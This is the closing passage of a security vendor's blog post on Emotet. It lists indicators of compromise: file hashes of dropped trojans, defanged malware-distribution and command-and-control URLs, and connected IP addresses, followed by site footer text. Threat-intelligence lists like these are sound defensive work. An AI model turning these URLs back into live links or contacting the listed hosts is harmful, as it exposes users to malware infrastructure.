2563D86BB358D86D06856A5BECDCAD5B6461D88FDD49E362691D5DFAE43C4625
3B0609646D8FFC097DFEEFF7FC70A52B38C4AE53D93DE6FB96A1B1119E51DB4F
3C18597017EF58FEE97F8B28879DABEEC6DAE7A968A56A891D07D1DC52DDC3AF
4030D19135210C191D7761A432B295314588519A0D3497BEA401F6488C7DE445
69caceab49fdcf349e2862d18ed39ed586d4e1a973f2ffda9904808871f6bce1
81F1052A4D972B33990ACD682B38182AC89AE812BD2C3A0E195BA0384AA53753
A62F9B138B9EF335233E2F25C1682A516632671334A969FDC15C32558CB6FD5C
B9DCFF12869697646C0A62241CC211ED49D683324BA09663FCFD4EAD8F1C3807
C216A2A1E9F88F8889125D88D1875B1BB333D73A5F3DF9F63D238C5396594D06
D1A6784D0318BC92859A33AE5C4EA6F593DEB148DE4599D1DD14CFE807589E55
D97FD77F52628A1094C41E44E3781E81DA279039DE436CF313DBADE61FA1CD24
DC6C630936D718D02D1D3D8C71DA9847AB6FD9E79DC8695C5662793255F441B1
DDCCAD5FD03A3C620AABFFFE8B8464E8B2BEAF94954282D285E3850B0578DFA4
F4D9C1E45849B189548F2FCB45126B008CFA6254CFE2FABB789EC0F096672ECA
F93B39B2723F9F0AC2DFE978FE284FA887CCF7C9BFB5FD9428C59025F56C5E86
DROPPED EMOTET TROJANS
2E63942BF12B6FBB3F8A48716E5D97079E4DF668C9181D9A66651CBA873D2A17
53B07540383F3D8AB47DC8966D2ABCDD5885F1D5D2D0E1D2E5046F90EABDE3F6
5456471B260E664E9485D2CB8321D8E3B3033F700A5BDAAFC94E4BA8046FB87D
7ADDCF66ED2376C8F9B2ADAEFF04FC01C92881B2990D460EEFD60324209BD62C
890B9B288AA2C2183DA044232C2B750B83565741464E1938FD53444EB0929F18
928CC4AED8F8ABF2863F49142DCF4EE4BEE558E21161ED0296A32216EAA256D1
BFACADEFD24B4DC2ED4A1E928200C938A8608D24EDF651DB7A210972135FB149
E01516FEDFA82C82FB25F812AE106E4F4591B3191812B7FD93A0944731F335BA
EE2699909F938CD5A35535FA372C36E88163D9C3971283ADAA6F7EF0CD8A2795
F020910684E6B806586131E30692FFE070442A0288D67FF85E6506B97B86B6AB
FF27CB0A4046B7D4E23F007D65CDC52B06F41EE2DF99AB1133ED8A36862E4A21
URLS
hxxp://63.143.67.107:20/
hxxp://78.189.21.131/
hxxp://81.150.17.158:8443/
hxxp://187.140.90.91:8080/
hxxp://198.61.196.18:8080/
hxxp://201.190.150.60:443/
hxxp://210.2.86.72:8080/
hxxp://213.120.119.231:8443/
hxxp://bod-karonconsulting.com/ZhsjepZP/
hxxp://www.countdown2chaos.com/RteZ6CxTl3/
hxxp://fortifi.com/IQmS1zuNj
hxxp://www.ideenweberei.com/L9NXvhd/
hxxp://kliksys.com/yuZ6yAFq/
hxxp://limaxbatteries.com/yc8jyNd/
hxxp://strike3productions.com/fHXdHseo0/
hxxp://www.mtyfurnishing.com/uV0Z7WiM/
hxxp://www.omegaserbia.com/1rDAPTYEgE/
hxxp://www.wmdcustoms.com/SoYuALGOUR/
CONNECTED IPS
63.143.67.107
70.55.69.202
72.5.53.5
75.119.205.247
78.189.21.131
81.150.17.158
103.4.235.152
148.66.137.40
181.197.253.133
181.57.97.83
181.60.57.250
187.140.90.91
188.166.101.236
189.222.20.165
190.195.129.227
195.208.1.119
198.61.196.18
201.190.150.60
209.95.55.249
210.2.86.72
213.120.119.231
216.120.247.90
SHARE THIS:
DISCOVER
MORE RESOURCES
A BRIEF HISTORY AND FURTHER TECHNICAL ANALYSIS OF SODINOKIBI RANSOMWARE
TTPS AND MALWARE USED BY MUDDYWATER CYBER ESPIONAGE GROUP
ZEPPELIN RANSOMWARE ANALYSIS, SIMULATION, AND MITIGATION
SUBSCRIBE
KEEP UP TO DATE WITH LATEST BLOG POSTS
Notification Frequency
* I would like to receive emails including latest blog posts about emerging
threats, events, product news, and more from Picus.
*
By clicking the button below, you agree our Privacy Policy.
United States
160 Spear Street, #1000
San Francisco, CA 94105 USA
+1 (415) 890 5105
3001 North Rocky Point Drive East
Suite 200
Tampa, FL 33607 USA
+1 (336) 510 2907
United Kingdom
Work.Life Soho,
9 Noel Street, London, W1F 8GQ, UK
+44 20 38077425
Singapore
331 North Bridge Road, Odeon Towers, #22-05 188720 Singapore
+65 3 1595424
Türkiye
Hacettepe Teknokent, Üniversiteler Mah.
1596. Cad. 1. Ar-Ge 97/12 Beytepe,
Çankaya/ Ankara, TR
+90 (312) 235 3579
Email
info@picussecurity.com
Platform
* The Complete Security Control Validation Platform
* Security Control Validation for Prevention Controls
* Security Control Validation for Detection Controls
Integrations
* Network Security Technologies
* Security Incident and Event Management (SIEM)
* Endpoint Detection and Response (EDR)
* Security Orchestration, Automation and Response (SOAR)
Use Cases
* Security Posture Management
* Security Control Validation
* Security Control Rationalization
* Enhancing Detection Efficacy
* Compliance Enablement
Resources
* Reports & Guides
* Webinars
* Newsletter
* MITRE ATT&CK
* Purple Academy
Partners
* Technology Alliances
* About the Partner Program
* Become a Picus Partner
Company
* About Us
* Careers
* Contact
* Customer Support Portal
Follow us on LinkedIn Follow us on Twitter Follow us on Facebook
© 2022 Copyright. All rights reserved.
Terms | Privacy | Security